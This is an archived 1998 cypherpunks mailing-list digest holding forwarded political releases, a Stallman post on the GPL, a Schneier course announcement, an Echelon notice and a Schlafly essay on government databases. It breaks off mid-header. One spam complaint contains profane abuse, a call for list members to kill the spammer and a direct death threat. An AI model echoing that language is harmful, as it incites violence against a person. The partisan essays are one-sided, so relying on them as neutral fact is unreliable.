



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 30 Sep 1998 09:24:42 +0800
To: cypherpunks@cyberpass.net
Subject: IP: 1998 FBI WISH LIST - Unlimited Wiretaps!
Message-ID: <v0401170fb237ee5afb67@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
Date: Wed, 30 Sep 1998 05:55:01 -0400 (EDT)
To: ignition-point@majordomo.pobox.com
From: softwar@us.net (CharlesSmith)
Subject: IP: 1998 FBI WISH LIST - Unlimited Wiretaps!
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: softwar@us.net (CharlesSmith)

September 29, 1998 --from Congressman Barr's web site

BARR EXPOSES DEPARTMENT OF JUSTICE POWER GRAB

WASHINGTON, DC -- U.S. Representative Bob Barr (GA-7) released today
information exposing an effort by the Department of Justice to obtain
massive new enforcement powers in the closing days of the 105th Congress. Barr
obtained the information from a confidential source within federal law
enforcement.  Among other things, the Department's "wish list" for new
authority includes (among others):

A vastly expanded definition of terrorism to include domestic crimes
having no relationship to terrorism.

The power to seize commercial transportation assets for federal use.

The ability to commander personnel from other federal agencies without
reimbursement.

Expanded wiretap authority to allow "roving" wiretaps, and wiretaps
without any court authority.

Enlarged asset forfeiture provisions to allow the FBI to seize personal
property in both criminal and civil matters.

The establishment of a permanent "FBI Police Force."

Loosening of Posse Comitatus restrictions to allow more military
involvement in domestic law enforcement.

Authority to force telephone and Internet companies to divulge
information on their customers.

"These requests belong in some bizarre conspiracy novel, not in serious
legislative documents being circulated at the top levels of federal law
enforcement.  These proposals represent a sneak attack on the most cherished
principles of our democracy.  If they become a part of our law, freedom and
privacy in America will be permanently and severely diminished," said Barr.

Barr also noted the Department and the FBI are "shopping" this wish list
in an effort to get the items placed in a spending measure without hearings
or debate.


================================================================
1 if by land, 2 if by sea.  Paul Revere - encryption 1775
Charles R. Smith
SOFTWAR         http://www.softwar.net      softwar@softwar.net
Pcyphered SIGNATURE:
742A59841467BC656DC19CD9D14B57318A1D3BDAB365AA32D70AD05DFAA08FC7
16CACEB73A010562BC412D6F45E1A2B88074A90A1D3AD6077895CAC1FDE25404
8C02268DEC1D0880
================================================================
SOFTWAR EMAIL NEWSLETTER                            09/30/1998
***  to unsubscribe reply with "unsubscribe" as subject    ***
================================================================






**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Stallman <rms@santafe.edu>
Date: Wed, 30 Sep 1998 11:26:24 +0800
To: aba@dcs.ex.ac.uk
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199809281845.TAA18662@server.eternity.org>
Message-ID: <199809301621.KAA09089@wijiji.santafe.edu>
MIME-Version: 1.0
Content-Type: text/plain



I designed the GNU GPL to insist that you must make your code free
software, if you include GPL-covered code in it.  I did this for a
reason: to encourage people to make software free.  It does this by
providing code that is available only for writing free software, not
for writing proprietary software.

The GNU GPL works well to promote free software (see
http://www.gnu.org/philosophy/pragmatic.html).  It also permits
commercial use of the code.  What it does not permit is using the code
in a proprietary program.  I won't use proprietary software, I want to
have free software for every job.  So I have no reason to help you
write any proprietary software.  If you want code you can use in a
proprietary program, you are out of luck.

It isn't surprising that people who want to write non-free software
are disappointed that the GNU project won't help them.  What is
amazing is that they feel this is unfair.  They have no intention of
letting me use their source code in my programs--so why should they be
entitled to use my source code in their programs?  These people seem
to think that their selfishness entitles them to special treatment.

The GPL is my way of offering a certain kind of cooperation to anyone
else who is willing to cooperate in the same way.


For an explanation of the difference between commercial and
proprietary, see http://www.gnu.org/philosophy/categories.html and
http://www.gnu.org/philosophy/selling.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Stallman <rms@santafe.edu>
Date: Wed, 30 Sep 1998 11:22:56 +0800
To: aba@dcs.ex.ac.uk
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199809281845.TAA18662@server.eternity.org>
Message-ID: <199809301621.KAA09091@wijiji.santafe.edu>
MIME-Version: 1.0
Content-Type: text/plain



    All stuff I have written (non-commercially) so far has been PD.
    (Actually I don't even dignify it with a `this is PD' note -- I
    personally have zip respect for copyright, patents, licenses).

Legally, what this means is that your software is copyrighted, and any
redistribution of it is illegal.  That counterintuitive consequence is
the due to a treaty, the Berne Convention, that was designed to cater
to copyright owners.

    However, perhaps one could do one better than PD: restrict use to
    propogate cypherpunk goals.  eg. 

    - You may not use this code in software which provides government back
    doors.

    - secret service agencies can not use this software / or must pay
    exorbitant license fees

My information is that such criteria are not legally enforcible under
copyright law in many countries.  You should probably check with a
copyright lawyer before trying such a thing.

In addition, a program with a restriction like this is not free
software, so people would probably work on a free replacement for it.
I don't want government back doors in any software I use, but this
kind of restriction is the wrong way to avoid them.  The right way is
through the GNU GPL, which would enable people to check the source
code of a modified version for anything suspicious.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Cory R. King" <coryking@azalea.com>
Date: Wed, 30 Sep 1998 13:12:39 +0800
To: "'usa.net@abuse.net>
Subject: SPAM -> FW: Increase Your Paycheck Next Week
Message-ID: <2103E70650D5D11189650080ADB400C505A57A@DOGBONE>
MIME-Version: 1.0
Content-Type: text/plain



Without a doubt, this is the first spam that has made me seriously
question taking the low ground in the spam wars, and just totally
fucking with this guy.. I've got quite a stack of "bill-me-later"
magazine subscriptions that I would be more then happy to sign this
asshole up to....

TO AOL.COM:  This puppy came from you....  all lines above - 
Received: from 152.202.71.131 (202-71-131.ipt.aol.com
[152.202.71.131])....
 - are part of the mailing list that this asshole sent to...  also take
a look at the last sentence of this guys spam....  oooooooooooo... I'm
gonna mail him some "abusive" shit in a second!!!!!!!  LART this luser
GOOD!!!!

TO USA.NET:  To drop boxes to investigate:  2001files@usa.net,
business_ideas@usa.net

TO CYPHERPUNKS:  If any of you guys are the "psychotic" kind... please
be so kind as to kill this asshole...  How DARE he threaten us (see last
line of spam!).... fucker.....

TO BUSINESS_IDEAS@USA.NET:  HEY!!! ASSHOLE!!!!  HOW ABOUT YOU FORWARD
THIS "ABUSIVE" LANGUAGE TO YOUR FUCKING FBI AND "INTERPOL" YOU FUCKING
SHITHEAD!!!!!  IF I EVER SEE YOU ON THE STREET, MARK MY WORDS, YOU ARE A
DEAD MAN!!!!!!!!!!!!!!!!!


-----------------
Cory R. King

"As soon as men decide that all means are permitted to fight an evil,
then their good becomes indistinguishable from the evil that they set
out to destroy."
 - Christopher Dawson

-----Original Message-----
Received: from www.video-collage.com ([206.15.171.132]) by
dogbone.azalea.com with SMTP (Microsoft Exchange Internet Mail Service
Version 5.5.1960.3)
	id T5JVBF6T; Wed, 30 Sep 1998 09:56:22 -0700
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id MAA01379
	for cypherpunks-outgoing; Wed, 30 Sep 1998 12:03:54 -0400 (EDT)
Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id MAA01367
	for <cypherpunks@algebra.com>; Wed, 30 Sep 1998 12:03:48 -0400
(EDT)
Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.8.8) id
JAA20785; Wed, 30 Sep 1998 09:07:02 -0700 (PDT)
Received: from cyberpass.net (cyberpass.net [209.75.197.3]) by
sirius.infonex.com (8.8.8/8.8.8) with ESMTP id JAA20767 for
<cpunks@sirius.infonex.com>; Wed, 30 Sep 1998 09:06:56 -0700 (PDT)
Received: from 152.202.71.131 (202-71-131.ipt.aol.com [152.202.71.131])
by cyberpass.net (8.8.8/8.7.3) with SMTP id JAA07148 for
<cypherpunks@cyberpass.net>; Wed, 30 Sep 1998 09:08:07 -0700 (PDT)
Date: Wed, 30 Sep 1998 09:08:07 -0700 (PDT)
From: 2001files@usa.net
Message-Id: <199809301608.JAA07148@cyberpass.net>
To: cypherpunks@cyberpass.net
Reply-To: business_ideas@usa.net
Subject: Increase Your Paycheck Next Week
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com


Would you like to get a pay raise next week without asking your boss?
Then this very special report, "Money Power," is for you!

[spam snip]

	World Net Press
	Dept. EN-930
	P.O. Box 96594
	Las Vegas, NV 89193-6594
	
[spam snip]


Please be advised we collect the e-mail addresses of all flamers,
hackers, and users of abusive and vulgar language.  We submit these
addresses to the FBI and Interpol on a monthly basis.  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 30 Sep 1998 06:35:05 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Democracy...
Message-ID: <199809301127.NAA08129@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



I find that religion is one of the most detrimental forces to the
internet.  I believe that the internet is a very real chance to assert
self-rule.  A religious government would not allow that.  I might
worship false idols or something.  If government does start to favor
religious morals I hope it is voodoo!  That would at least add some
entertainment :)
==
"The same thing we do every night Pinkey,
 try to take over the WORLD!"
                          - The brain
_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Wed, 30 Sep 1998 14:24:58 +0800
To: cypherpunks@toad.com
Subject: Announcement: A Self-Study Course in Block Cipher Cryptanalysis
Message-ID: <199809301907.OAA15179@mixer.visi.com>
MIME-Version: 1.0
Content-Type: text/plain



Ever since writing Applied Cryptography, I have been asked to recommend a
book on cryptanalysis.  My unfortunate answer is that while there are
several good books on cryptography, there are no books, good or bad, on
cryptanalysis.

The only way to learn cryptanalysis is through practice.  A student simply
has to break algorithm after algorithm, inventing new techniques and
modifying existing ones.  Reading others' cryptanalysis results helps, but
there is no substitute for experience.

To help in getting this experience, I designed a self-study course in
block-cipher cryptanalysis.  With it, a student can follow an ordered path
through the academic literature and emerge out the other side fully capable
of breaking new algorithms and publishing new cryptanalytic results.

What I have done is to list published algorithms and published
cryptanalyses in a coherent order: by type of cryptanalysis and difficulty.
 A student's task is to read papers describing algorithms, and then attempt
to reproduce published cryptanalytic results.  (It is definitely more
difficult to learn cryptanalysis from academic papers than from a distilled
textbook, but the sooner a student gets used to reading academic papers the
better off he will be.)  The results, in other published papers, serve as
an "answer key."

The paper is available in both postscript and pdf formats at:

	http://www.counterpane.com/self-study.html

Comments are always appreciated.

Bruce
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
           Free crypto newsletter.  See:  http://www.counterpane.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 30 Sep 1998 13:23:42 +0800
To: cryptography@c2.net
Subject: [Fwd: EECS Colloquium Monday Oct 5]
Message-ID: <v0401170bb23826311cd9@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Wed, 30 Sep 1998 13:28:45 -0400
From: Richard Lethin <lethin@reservoir.com>
Organization: Reservoir Labs, Inc.
MIME-Version: 1.0
To: dcsb@ai.mit.edu
Subject: [Fwd: EECS Colloquium Monday Oct 5]
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: Richard Lethin <lethin@reservoir.com>
Status: U



Return-Path: <elias@theory.lcs.mit.edu>
Received: from LCS.MIT.EDU (mintaka.lcs.mit.edu [18.26.0.36])
	by deer-park.reservoir.com (8.8.5/8.8.5) with SMTP id LAA16438
	for <lethin@etcons.com>; Wed, 30 Sep 1998 11:34:14 -0400 (EDT)
Received: from theory.lcs.mit.edu by MINTAKA.LCS.MIT.EDU id aa29635;
          30 Sep 98 11:30 EDT
Received: from osprey.lcs.mit.edu by theory.lcs.mit.edu (5.65c/TOC-1.2S)
	id AA03777; Wed, 30 Sep 98 11:29:45 EDT
From: elias@theory.lcs.mit.edu (Peter Elias)
Received: by osprey.lcs.mit.edu (5.65c/TOC-1.2C)
	id AA00821; Wed, 30 Sep 98 11:29:47 EDT
Date: Wed, 30 Sep 98 11:29:47 EDT
Message-Id: <199809301529.AA00821@osprey.lcs.mit.edu>
To: eecsfaculty@eecs.mit.edu, seminars@lcs.mit.edu, ai-tech-sq@ai.mit.edu,
        joanne@theory.lcs.mit.edu, sgreen@ll.mit.edu, jsweeney@draper.com,
        kaths@lids.mit.edu, jc@cs.brandeis.edu, texasgal@mit.edu,
        bru@media.mit.edu, arthurs@mit.edu, dougross@mit.edu,
        finn@lids.mit.edu, roger@ipswitch.com
Subject: EECS Colloquium Monday Oct 5


Appended is the notice of an EECS Colloquium by Radia Perleman, on
Monday Oct. 5.  Please post and/or forward as appropriate.

Peter Elias
----------------------------------------------------------------------

			     MIT-EECS
			1998 Fall Semester
			 Colloquium Series


	       	  How to Misuse Good Cryptography
	       And Create Insecure Network Protocols

			  Radia Perlman
		  Boston Center for Networking
			SUN Microsystems



			     ABSTRACT


A common misconception is that security flaws involve abstruse
mathematical weaknesses in cryptographic algorithms. While it is
possible to have weak cryptographic algorithms, the world does not
need insecure cryptographic systems in order to design, build, and
deploy insecure network protocols.

This talk discusses example mistakes people have made when designing
or implementing network protocols. Examples include an e-mail standard
that allowed forging of signatures, a public key scheme less secure
than a secret key scheme, a system that thought encryption implied
integrity protection, and public key chain rules that are unworkable
in practice.


		          October 5, 1998
			        4-5 pm
		 Edgerton Hall, 34-101 (50 Vassar St)
		         Refreshments at 3:45


----------------------------------------------------------------------

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Wed, 30 Sep 1998 14:29:47 +0800
To: <cypherpunks@cyberpass.net>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <33CCFE438B9DD01192E800A024C84A19284704@mossbay.chaffeyhomes.com>
Message-ID: <v04011702b23833445730@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:41 PM -0500 9/29/98, Matthew James Gering wrote:
>Jim Choate wrote:

>> Had Microsoft, for example, been required to publish their
>> API's by the market we wouldn't be spending all this effort
   ^^^^^^^^^^^^^^^^^^^

>You state free-market and then you are *requiring* someone to do
>something? How do you resolve that contradiction? Require = Force !=
>Free[dom]

	Required as in purchasers large and small saying "You don't include
your source code, we won't buy it".

	Sort of like how restraunts are forced (usually) to provide
dinnerware, sure, they could MAKE you bring your own fork & plate, but they
wouldn't be too popular.

>As far as *commercial* software vendors go, Microsoft is one of the
>better companies for publishing APIs and creating useful APIs and tools
>for Rapid Application Development. Do you subscribe to MSDN? Please do
>before you crucify Microsoft for lack of APIs, if anything they have too
>many.

	"BETTER"?

	Remember "Undocumented Dos"?

	Wasn't there a (couple) windows versions?

	Microsoft sells/gives away it's API so that it can find competent
programmers to hire and lock away in tiny rooms.

--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 30 Sep 1998 13:25:02 +0800
To: cypherpunks@cyberpass.net
Subject: U.K. Hosts Bomb-Proof Computer Room
Message-ID: <v0401170cb238268c3238@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Wed, 30 Sep 1998 10:55:45 -0700 (PDT)
From: William Knowles <erehwon@kizmiaz.dis.org>
To: DC-Stuff <dc-stuff@dis.org>, Access All Areas <aaa-list@access.org.uk>
cc: Digital Commerce Society of Boston <dcsb@ai.mit.edu>
Subject: U.K. Hosts Bomb-Proof Computer Room
Organization: Home for retired social engineers & unrepented cryptophreaks
MIME-Version: 1.0
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: William Knowles <erehwon@kizmiaz.dis.org>

(Network Week) [9.30.98] Anyone worried about the security of
e-commerce might find a nuclear bomb-proof server room lightly
excessive, but that is exactly what British company AL Digital,
the company behind the Apache-SSL secure Web server, is offering.

AL Digital, based in London, is offering host servers at
The Bunker, an ex-military base that was formerly a key British
Ministry of Defense communications center. The company said the
facility had secure chambers buried deep underground and
communications capacity available on tap.

"We feel physical security is often overlooked," said AL
Digital director Adam Laurie. "Hacking and cracking are not
the major risks anymore because of strong encryption; where
you're vulnerable is at the physical point at which you
decrypt the data."

Laurie said the servers based at The Bunker would be protected
against electronic eavesdropping, physical intrusion, and
electromagnetic damage, as well as a nuclear strike.

"We could have built our own secure facility, but we heard
this was on the market," he added. He said it's as physically
robust as Telehouse, a high-security server-hosting facility in
Staten Island, N.Y., if not more so.


==
I regret to say that we of the FBI are powerless to act in
cases of oral-genital intimacy, unless it has in some way
obstructed interstate commerce. -- J. Edgar Hoover
==
http://www.dis.org/erehwon/



For help on using this list (especially unsubscribing), send a message to
"dcsb-request@ai.mit.edu" with one line of text: "help".

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Wed, 30 Sep 1998 07:21:57 +0800
To: cypherpunks@Algebra.COM
Subject: (fwd) Echelon
Message-ID: <36123036.40EE5E3@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



The following article came from Duncan Campbell <duncan@gn.apc.org>
through a mailing list:

__________________________________
21/9/98

The debate about ECHELON - last week in the European Parliament - has
again
highlighted the role of the NSA station at Menwith Hill, Yorkshire.  
The
report prepared earlier this year for the STOA (Scientific and Technical
Options Assessment) of the European Parliament resulted in widespread
coverage in Europe and the US.   

We have recently made a new batch of copies of the 1993 Dispatches
documentary on Menwith Hill - "The Hill" - based on revelations based on
NSA documents obtained by women peace protesters at the Hill.   It also
covers ECHELON and other NSA activities in the UK.   Tapes (45 mins) can
be
ordered from :

        Ian Hide 
        IPTV Ltd
        1 Meadowbank
        Edinburgh EH8 8JE

At 10.95 including postage.

I will e-mail trancripts of the programme free of charge to anyone
requesting it.

Duncan Campbell




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 30 Sep 1998 16:39:18 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Big Brother Is Monitoring Us by Databases - Sept. PSR - Part 1
Message-ID: <199809302133.OAA25653@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: ignition-point@majordomo.pobox.com
Subject: IP: Big Brother Is Monitoring Us by Databases - Sept. PSR - Part 1
Date: Tue, 29 Sep 1998 17:28:57 -0500
To: PSR@eagleforum.org

	PHYLLIS SCHLAFLY REPORT   
						September 1998

          Big Brother Is Monitoring Us by Databases 
   
 The hottest issue in America today is our discovery that the Federal
 Government is trying to tag, track and monitor our health care
 records through national databases and personal identification
 numbers. This is a priority election issue, and every Congressional
 and Senatorial candidate should be ready to answer questions from
 his constituents. 

 Americans are accustomed to enjoying the freedom to go about our
 daily lives without telling government what we are doing. The idea of
 having Big Brother monitor our life and activities, as forecast in
 George Orwell's great book 1984, is not acceptable in America. 

 Unfortunately, the liberals, who always seek control over how we live
 our lives and how we spend our money, are using terrorists,
 criminals, illegal aliens, welfare cheats, and deadbeat dads as
 excuses to impose oppressive government surveillance over our
 private lives. It is typical of the liberals to go after law-abiding citizens
 rather than just the law-violators. 

 Modern technology has made it possible to build a file on every
 American, and to record and track our comings and goings.
 Computers can now collect and store immense databases, with
 detailed records about individual Americans' health status and
 treatment, job status and applications, automobiles and driving,
 financial transactions, credit, banking, school and college
 performance, and travels within and without the country. 

 In the novel 1984, an omnipresent Big Brother watched every citizen
 at home and work from a giant television screen. Databases can now
 accomplish the same surveillance and tracking much more
 efficiently. In the novel 1984, Big Brother was able to read the
 individual's secret diary hidden in his home. The Clinton
 Administration and the FBI are right now demanding the right to read
 our e-mail and computer files, listen in on our phone conversations,
 and track the whereabouts of our cell phone calls. 

 Some of these databases are under the direct control of the
 government (e.g., Internal Revenue, Social Security, and the
 Department of Education, which has amassed 15 national
 databases), and some are privately owned but give access to the
 government. These databases convey enormous power to whoever
 controls them. In government hands, they are the power to control
 our very life, our health care, our access to a job, our financial
 transactions, and our entry to school and college. In private hands,
 these databases are immensely profitable to the companies that own
 them and market them for commercial purposes. 

 The Clinton Administration, Congress, big corporations that funnel
 million of dollars of soft money into political coffers, and some
 powerful foundations have cooperated in seeking federal legislation to
 establish a property right in these databases. So much power and
 money are involved in accessing and controlling personal information
 that the Washington lobbyists are moving rapidly to lock in the
 extraordinary powers Congress has already conferred on those who
 build databases and to build a wall of federal protection around them. 

 If we want to preserve American freedom, it's time to stop government
 access to these databases. Let's look at some of the ways that
 Clinton and Congress have cooperated in the building of databases
 that tag, track and monitor our daily lives. 

    1.The 1996 Kennedy-Kassebaum law (the Health Insurance
      Portability and Accountability Act) gives the Department of
      Health and Human Services (HHS) the power to create
      "unique health care identifiers" so that government can
      electronically tag, track and monitor every citizen's personal
      medical records. The plan is that everyone must submit an
      identification document with a unique number in order to
      receive health care, or the provider will not be paid. A
      database containing every American's medical records,
      identified by a unique number, was a central feature of
      Clinton's defeated 1994 health care bill, but it reemerged in the
      Kennedy-Kassebaum bill. Bill Clinton, Ted Kennedy, and Bob
      Dole all bragged about passing this law. 

    2.H.R. 4250, the 1998 Patient Protection Act, passed by the
      House on July 24, 1998, will allow anyone who maintains
      personal medical records to gather, exchange and distribute
      them. The only condition on distribution is that the information
      be used for "health care operations," which is vague and
      meaningless. 

      Even worse, H.R. 4250 preempts state laws that currently
      protect patients from unauthorized distribution of their medical
      records. There are several exemptions to the gathering of
      information that reveal the liberal bias of the drafters of this bill:
      The bill exempts from the gathering of medical records any
      information about abortions performed on minors. That
      provision is a sure sign of the kind of control of health care
      that this bill opens up. 

    3.The Collections of Information Antipiracy Act (which
      originally had another number) was added (just before House
      passage) to H.R. 2281, the 1998 WIPO Copyright Treaties
      Implementation Act and the Internet Copyright Infringement
      Liability Clarification Act. No one, of course, is in favor of
      "piracy," but this bill goes far beyond any reasonable definition
      of piracy. 

      This Collections of Information bill, in effect, creates a new
      federal property right to own, manage and control personal
      information about you, including your name, address,
      telephone number, medical records, and "any other intangible
      material capable of being collected and organized in a
      systematic way." This bill provides a powerful incentive for
      corporations to build nationwide databases of the personal
      medical information envisioned by the Kennedy-Kassebaum
      law and the Patient Protection bill. This bill will encourage
      health care corporations to assign a unique national health
      identifier to each patient. The government can then simply
      agree to use a privately-assigned national identifier, and
      Clinton's longtime goal of government control of health care
      will be achieved. 

      Under the Collections of Information bill, any information about
      you can be owned and controlled by others under protection of
      Federal law. Your medical chart detailing your visits to your
      doctor, for example, would suddenly become the federally
      protected property of other persons or corporations, and their
      rights would be protected by Federal police power. This bill
      creates a new Federal crime that penalizes a first offense by a
      fine of up to $250,000 or imprisonment for up to five years, or
      both, for interfering with this new property right. It even
      authorizes Federal judges to order seizure of property before a
      finding of wrongdoing. 

      H.R. 2281 grants these new Federal rights only to private
      databases, and pretends to exclude the government's own
      efforts to collect information about citizens. But a loophole in
      the bill permits private firms to share their federally protected
      data with the government so long as the information is not
      collected under a specific government agency or license
      agreement. This loophole will encourage corporations,
      foundations, Washington insiders and political donors to build
      massive databases of citizens' medical and other personal
      records, and then share that data with the government. 

    4.The 1993 Comprehensive Child Immunization Act
      authorized the Department of Health and Human Services "to
      establish state registry systems to monitor the immunization
      status of all children." HHS and the Robert Wood Johnson
      Foundation have since sent hundreds of millions of dollars to
      states to set up these databases (often without parental
      knowledge or consent). 

      The Centers for Disease Control (CDC) is aggressively trying
      to convert these state databases into a national database of
      all children's medical records. The CDC is using the tracking
      of immunizations as a ruse to build a national patient
      information system. The government is already demanding
      that all newborns and all children who enter school be given
      the controversial Hepatitis B vaccine. This is just the start of
      government control of our health care made possible by
      databases of medical records. 

    5.The 1996 Illegal Immigration Reform and Immigrant
      Responsibility Act (especially Section 656(b)) prohibits the
      use of state driver's licenses after Oct. 1, 2000 unless they
      contain Social Security numbers as the unique numeric
      identifier "that can be read visually or by electronic means."
      The act requires all driver's licenses to conform to regulations
      promulgated by the Secretary of Transportation, and it is
      clearly an attempt to convert driver's licenses into national I.D.
      Cards. This law also orders the Transportation Department to
      engage in "consultation" with the American Association of
      Motor Vehicle Administrators, which has long urged using
      driver's licenses, with Social Security numbers and digital
      fingerprinting, as a de facto national ID card that would enable
      the government to track everyone's movements throughout
      North America. 

      When Social Security was started, the government made a
      contract with the American people that the Social Security
      number would never be used for identification. Call this another
      broken promise. 

      Meanwhile, many states are already trying to legislate driver's
      licenses that are actually a "smart card" with a magnetic strip
      that contains a digitized fingerprint, retina scan, DNA print,
      voice print, or other biometric identifiers. These smart cards
      will leave an electronic trail every time you use it. New
      Jersey's proposed smart card would even track your payment
      of bridge and highway tolls and loans of books from the library,
      as well as credit card purchases and visits to your doctor. 

    6.The 1996 Welfare Reform Act (the Personal Responsibility
      and Work Opportunity Reform Act) sets up the Directory of
      New Hires. All employers are now required to send the
      government the name, address and Social Security number of
      every new worker and every employee who is promoted. This
      will eventually be a massive database, tracking nearly every
      worker in America. 

    7.Public-private partnerships. An example of how databases
      and copyrights, in partnerships with the government, can be
      used for private gain and control over millions of people is the
      way the American Medical Association (AMA) worked out an
      exclusive contract with the Health Care Financing
      Administration (HCFA), a division of the Department of Health
      and Human Services (HHS). The AMA developed and
      copyrighted a database of 6,000 medical procedures and
      treatments to use as a billing system. The AMA then
      contracted with HCFA to force the entire health care industry
      (including all doctors) to buy and use the AMA's system. 

 A federal Court of Appeals reviewed this peculiar AMA/HCFA
 arrangement and, in August 1997, held that the AMA had "misused
 its copyright by licensing the [payment coding system] to HCFA in
 exchange for HCFA's agreement not to use a competing coding
 system." The court stated, "The plain language of the AMA's
 licensing agreement requires HCFA to use the AMA's copyrighted
 coding system and prohibits HCFA from using any other." 

 This exclusive government-granted monopoly is worth tens of millions
 of dollars annually to the AMA, and it ensures the AMA's support of
 any Clinton health care proposal, no matter how socialistic. This type
 of public-private partnership, often concealed from public scrutiny, is
 becoming the preferred technique to advance the liberal agenda. 

 The American people do not want their private life and activities
 monitored by Big Brother. Tell your Congressman and Senator to
 repeal all these provisions which protect the building of databases
 that track our daily activities. 

	------------------------------------

To read the entire September 98 PSR go to:
http://www.eagleforum.org/psr/1998/sept98/psrsept98.html

	------------------------------------

The "Dirty Dozen" . . .   Here are the 12
Republicans who voted to uphold Clinton's veto of
the partial-birth abortion ban.
http://www.eagleforum.org/alert/98-09-22/dirty_dozen.html

	------------------------------------

	JOIN EAGLE FORUM!
To receive the Phyllis Schlafly Report  HARDCOPY 
	-- Subscription: $20 per year 

Send check or money order to: 
Eagle Forum * P.O. Box 618 * Alton * IL 62002 

-------------------------------------------------------------------
http://www.eagleforum.org
eagle@eagleforum.org
Phone: 618-462-5415  Fax: 618-462-8909
---------------------------------------------------------------
To subscribe to Eagle E-mail 
please e-mail  eagle@eagleforum.org 
with SUBSCRIBE in the subject line
-----------------------------------------------------









**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 30 Sep 1998 16:40:36 +0800
To: cypherpunks@cyberpass.net
Subject: IP: FW: Release: seizing money
Message-ID: <199809302133.OAA25664@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "mcdonald" <mcdonalds@airnet.net>
Subject: IP: FW: Release: seizing money
Date: Wed, 30 Sep 1998 07:15:31 -0500
To: ignition-point@majordomo.pobox.com


-----Original Message-----
From: beasley@ro.com [mailto:beasley@ro.com] 
Sent: Tuesday, September 29, 1998 11:06 PM
To: mcdonalds@airnet.net
Cc: gs924jfj@mon-cre.net; patriot@vallnet.com; Jeff.Ballard@vmic.com
Subject: FWD: Release: seizing money


From: announce@lp.org
Subject: Release: seizing money
Sender: announce-request@lp.org
Reply-To: announce@lp.org
To: announce@lp.org (Libertarian Party announcements)
X-Mailer: mailout v1.26 released with lsendfix 1.8


-----BEGIN PGP SIGNED MESSAGE-----

=======================================
NEWS FROM THE LIBERTARIAN PARTY
2600 Virginia Avenue, NW, Suite 100
Washington DC 20037
=======================================
For release: September 29, 1998
=======================================
